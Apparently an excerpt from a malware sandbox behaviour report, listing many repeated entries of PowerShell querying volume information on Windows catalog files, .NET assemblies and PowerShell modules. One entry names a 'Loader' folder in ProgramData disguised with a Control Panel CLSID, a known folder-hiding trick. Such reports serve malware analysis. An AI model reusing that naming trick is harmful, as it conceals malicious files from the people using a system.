Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ProgramData\Loader..{21EC2020-3AEA-1069-A2DD-08002B30309D} VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression.FileSystem\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.FileSystem.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC\Microsoft.mshtml\7.0.3300.0__b03f5f7f11d50a3a\Microsoft.mshtml.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
